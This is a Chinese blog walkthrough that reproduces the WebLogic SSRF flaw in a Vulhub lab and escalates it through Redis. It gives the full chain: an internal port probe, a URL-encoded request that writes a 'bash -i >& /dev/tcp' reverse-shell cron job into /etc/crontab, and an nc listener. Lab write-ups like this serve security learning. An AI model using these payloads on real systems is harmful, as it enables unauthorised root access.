Weblogic SSRF漏洞复现

已于 2022-11-30 21:56:58 修改
阅读量1k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2022-11-30 21:53:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51151498/article/details/128105092
版权

 SSRF简介

 SSRF全称为Server-side Request Fogery,中文含义为服务器端请求伪造,漏洞产生的原因是服务端提供了能够从其他服务器应用获取数据的功能,比如从指定的URL地址获取网页内容,加载指定地址的图片、数据、下载等。

漏洞环境搭建

使用Vulhub搭建

git clone https://github.com/vulhub/vulhub.git    #vulhuba靶场下载

1.cd vulhub/weblogic/ssrf  #进入ssrf文件夹

2.docker-compose up -d  #启动编译靶场

启动靶场

访问docker IP:7001console/login/LoginForm.jsp

出现此界面,环境搭建成功

SSRF漏洞位于http://IP:7001/uddiexplorer/SearchPublicRegistries.jsp

点击search,用bp抓包

 "operator"参数后面是URL,可探测内网信息。

修改URL,探测7001端口,返回404提示,证明内网开放7001端口。

 探测不存在的端口,返回“but could not connect over”无法连接

 查看redis服务IP

 docker exec -it e84d45b3ec84  /bin/bash

查看redis服务

"Received a response"表示存在redis服务

利用Redis反弹shell

发送三条redis命令,将反弹shell脚本写入/etc/crontab

test

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/虚拟机的ip/2022 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

qwezxc

URL编码:

test%0D%0A%0D%0Aset%201%20%22\n\n\n\n*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.16.115.130%2F2022%200%3E%261\n\n\n\n%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aqwezxc

这里使用火狐插件HackBar

http://172.17.0.1:7001//uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.18.0.3:6379/test%0D%0A%0D%0Aset%201%20%22\n\n\n\n*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.16.115.130%2F2022%200%3E%261\n\n\n\n%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aqwezxc

打开kali监听

nc -lvvp 2022

稍等一会,反弹shell

以上

如有问题,欢迎留言。

- Time
关注
专栏目录
weblogic ssrf 漏洞复现
薛定谔嘚喵博客
05-06 671
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
WebLogic SSRF漏洞复现安全防护
XvrgMatlab的博客
09-26 67
本文将详细介绍如何复现WebLogic SSRF漏洞,并提供相应的源代码示例,同时探讨针对该漏洞安全防护措施。为了保护WebLogic服务器免受SSRF漏洞的攻击,建议采取输入验证和过滤、防火墙配置和网络隔离、更新和安全配置等安全防护措施。通过综合应用这些措施,可以有效降低WebLogic服务器受到SSRF漏洞攻击的风险,提升系统的安全性。这是一个非常简单的示例,用于说明SSRF漏洞的原理。方法中,可以实现自定义的输入验证逻辑,例如检查协议是否为HTTP或HTTPS,并限制可以访问的域名。
weblogic ssrf漏洞复现
weixin_44110913的博客
11-06 434
采用的虚拟机环境为ubuntu16.04,在虚拟机上搭建好docker环境。采用的vulhub来进行复现。 使用git来下载,命令为git clone https://github.com/vulhub/vulhub.git 进入ssrf漏洞中, cd /vulh...
ssrf漏洞复现
最新发布
Wincreds的博客
08-25 439
3.给info随便赋一个值,出来了php界面,可以观察到hostname主机和端口,而172.21.0.3是可以绕过127.0.0.1这个条件,我们可以在这个地址上测试,不断的改变端口值,端口不一样,出来的值也会有所区别。2.使用端口访问文件,可以看到有一个过滤条件,它限制了file,dict协议,127.0.0.1和localhost 也不能用,其实就是不想你探测内网端口,也不能读取内网服务文件。6.发现80端口不可用,后续请教同学,经过扫描ip以及分析,得出6379端口也是对外开放,
Weblogic-SSRF漏洞复现
小小猪的博客
11-22 2861
Weblogic-SSRF漏洞复现 漏洞分析: Weblogic服务端请求伪造漏洞出现在uddi组件(所以安装Weblogic时如果没有选择uddi组件那么就不会有该漏洞),更准确地说是uudi包实现包uddiexplorer.war下的SearchPublicRegistries.jsp。 漏洞复现: 使用docker来模拟漏洞环境 docker github地址:地址 搭建的载体为Ubuntu 搭建过程不在详述,搭建完成后,访问http://your-ip:7001/uddiexplor.
漏洞复现Weblogic SSRF漏洞复现
Miraitowax
02-22 1216
Weblogic SSRF的漏洞原理,漏洞复现步骤详细总结及剖析
WebLogic SSRF漏洞复现
qq_36567469的博客
04-18 2901
weblogic ssrf漏洞复现
weblogic ssrf漏洞复现
m0_71635484的博客
03-20 329
weblogic ssrf漏洞复现
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
Weblogic SSRF漏洞漏洞复现
qq_48744846的博客
04-14 3745
访问http://192.168.43.8:7001/uddiexplorer/,无需登录即可查看 uddiexplorer 应用: SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp,仔细查看发现这里有参数传入的是URL,差不多可以断定就是在这个点存在 SSRF 漏洞了: 在 BurpSuite 下抓包测试该漏洞,查询请求的operator参数可以进行端口探测,当我们输入不同值时可得到...
Weblogic ssrf漏洞复现
wutiangui的博客
11-06 417
Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上;SSRF漏洞就是通过篡改获取资源的请求发送给服务器,但是服务器并没有检测这个请求是否合法的,然后服务器以这个请求中的身份来访问其他服务器的资源。产生的原因:服务器端的验证并没有对其请求获取图片的参数(image=)做出严格的过滤以及限制,导致A网站可以从其他服务器的获取数据。安全的网站应接收请求后,检测请求的合法性。或者使用以下工具探测。
[漏洞复现]Weblogic SSRF漏洞复现
wwxxee
05-20 668
Weblogic SSRF漏洞复现 环境:vulhub/weblogic/ssrf 漏洞点 http://192.168.17.134:7001/uddiexplorer/SearchPublicRegistries.jsp 通过抓包发现: 将此处替换为其他的地址可以有不同的回显。 例如: http://127.0.0.1:7001 回显: weblogic.uddi.client.structures.exception.XML_SoapException: The server at http://1
Weblogic SSRF漏洞复现(CVE-2014-4210)【vulhub靶场】
m0_55854679的博客
08-09 1637
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
11.Weblogic-SSRF漏洞复现
weixin_30527323的博客
10-09 187
应为这一阵正好在学习SSRF漏洞,又苦于本人太菜没有挖到SSRF,只能复现... 先贴出很早之前央视网SSRF可窥探内网(Weblogic SSRF案例):https://www.secpulse.com/archives/38967.html Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件 服务端请...
vulhub weblogic ssrf漏洞
03-16
vulhub weblogic ssrf漏洞是指在WebLogic服务器中存在一种安全漏洞,攻击者可以利用该漏洞来发起服务器端请求伪造(SSRF)攻击。攻击者可以利用该漏洞来访问受保护的内部网络资源,或者利用该漏洞来发起其他攻击,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值